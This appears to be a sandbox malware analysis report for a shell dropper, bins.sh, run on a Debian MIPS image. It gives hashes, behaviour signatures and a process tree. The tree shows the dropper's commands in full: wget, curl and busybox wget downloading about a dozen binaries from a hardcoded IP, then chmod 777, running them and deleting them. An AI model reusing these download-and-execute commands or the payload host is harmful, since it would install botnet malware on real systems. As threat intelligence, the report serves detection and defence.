Analysis
-
max time kernel
118s -
max time network
174s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
04-11-2024 04:02
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
3974491d00b9582e0258135c610a9421
-
SHA1
ecc37a0827534c2c0481e0612cd6df3fc19cf86e
-
SHA256
6bfa6f703269861e72d2adaf8105b6e76da66084c6242ca779b0a88fba559328
-
SHA512
7ede6a7178e143e32559bf9d3d51f2a6ab740c5e865bac2d7a173aef231ba0856edd270e2d8cada9440d33606071b1b89fda997c11b31fe7121618274641b57a
-
SSDEEP
192:hZC8+oCsQQl95VnaK4St9bi6I7HDvb5k8h74i6I7H/0vb5k8EC8+oCsQQHZ5VnaZ:hZhVrQQlSSnCvb5k8h790vb5k8EhVrQZ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 740 chmod 980 chmod 962 chmod 968 chmod 878 chmod 926 chmod 866 chmod 938 chmod 746 chmod 754 chmod 884 chmod 914 chmod 920 chmod 932 chmod 950 chmod 818 chmod 890 chmod 860 chmod 908 chmod 944 chmod 956 chmod 974 chmod 780 chmod 834 chmod 902 chmod 811 chmod 896 chmod 872 chmod -
Executes dropped EXE 28 IoCs
Processes:
Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBMQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRUQLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0RYkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC2013LziPPOU64KElhsy06VSGNerH5jNdigllb9hjKgLiksrxr40vGLawuxTS92IUqQec3RYkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0Rb9hjKgLiksrxr40vGLawuxTS92IUqQec3R1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC2013LziPPOU64KElhsy06VSGNerH5jNdigll0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PBIx6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTEEGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYdNkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfiv2saiQIFq9K1TWRSrfvBqfdoJEY362VGsAxqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhzMQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRUQLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1ioc pid Process /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 741 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 747 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 755 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 782 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 813 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU 819 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 835 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz 861 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 867 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R 873 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj 879 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 885 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll 891 13LziPPOU64KElhsy06VSGNerH5jNdigll /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R 897 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj 903 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 909 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R 915 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R 921 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 927 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll 933 13LziPPOU64KElhsy06VSGNerH5jNdigll /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB 939 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE 945 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd 951 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi 957 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA 963 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz 969 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU 975 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 981 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wget13LziPPOU64KElhsy06VSGNerH5jNdigllwgetbusyboxrmcurlbusyboxrmcurl13LziPPOU64KElhsy06VSGNerH5jNdigllpid Process 929 wget 933 13LziPPOU64KElhsy06VSGNerH5jNdigll 887 wget 889 busybox 892 rm 930 curl 931 busybox 934 rm 888 curl 891 13LziPPOU64KElhsy06VSGNerH5jNdigll -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl File opened for modification /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl File opened for modification /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl File opened for modification /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl File opened for modification /tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA curl File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz curl File opened for modification /tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5 curl File opened for modification /tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll curl File opened for modification /tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R curl File opened for modification /tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd curl File opened for modification /tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE curl File opened for modification /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl File opened for modification /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R curl File opened for modification /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl File opened for modification /tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU curl File opened for modification /tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj curl File opened for modification /tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20 curl File opened for modification /tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi curl File opened for modification /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl File opened for modification /tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:708
-
/bin/rm/bin/rm bins.sh2⤵PID:711
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:715
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:738
-
-
/bin/chmodchmod 777 Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE./Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm Ix6VOWnT9OWWWGOM7Q1453Wi6oDWMuEoTE2⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:745
-
-
/bin/chmodchmod 777 EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd./EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm EGLz8f6XLVpZXbD6cUw0KPmV7xG50LTVYd2⤵PID:748
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:749
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:751
-
-
/bin/chmodchmod 777 NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi./NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵
- Executes dropped EXE
PID:755
-
-
/bin/rmrm NkgpaOQdTtieFdxuwsluhn2vBIlPYsxcfi2⤵PID:757
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:758
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:775
-
-
/bin/chmodchmod 777 v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA./v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵
- Executes dropped EXE
PID:782
-
-
/bin/rmrm v2saiQIFq9K1TWRSrfvBqfdoJEY362VGsA2⤵PID:785
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:786
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:809
-
-
/bin/chmodchmod 777 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB./0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm 0qnht3x6wgBt4VIDkGzRtNIgXNfuERS0PB2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:817
-
-
/bin/chmodchmod 777 MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU./MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm MQ3jCh9hXhhx5ZQVcU2TLN9KA2vZHmSkRU2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:830
-
-
/bin/chmodchmod 777 QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY1./QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm QLwzp0RthdbRxhlDbVd9BCiEqwJIVs9mY12⤵PID:838
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:840
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:859
-
-
/bin/chmodchmod 777 xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz./xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm xqR6CtJ7I5SA21RGG9xv8mviIbGLeaGEhz2⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:865
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:871
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:877
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:883
-
-
/bin/chmodchmod 777 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC20./1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:889
-
-
/bin/chmodchmod 777 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/13LziPPOU64KElhsy06VSGNerH5jNdigll./13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:891
-
-
/bin/rmrm 13LziPPOU64KElhsy06VSGNerH5jNdigll2⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:895
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:901
-
-
/bin/chmodchmod 777 YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj./YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm YkDlYoffDmpKTMBNoE1KgIVaznlPTiE1Oj2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:907
-
-
/bin/chmodchmod 777 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni5./4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 4ewLZxf0R32HQ8a6Do3AYB1fjbH1ghrni52⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:913
-
-
/bin/chmodchmod 777 xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R./xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm xlEbFSB2bbkwCOvy8Z2s6liUF4Jw4E6g0R2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:919
-
-
/bin/chmodchmod 777 b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/b9hjKgLiksrxr40vGLawuxTS92IUqQec3R./b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm b9hjKgLiksrxr40vGLawuxTS92IUqQec3R2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1zK7yGQUfgUKPen8u9BmoS2dym7kLsgC202⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
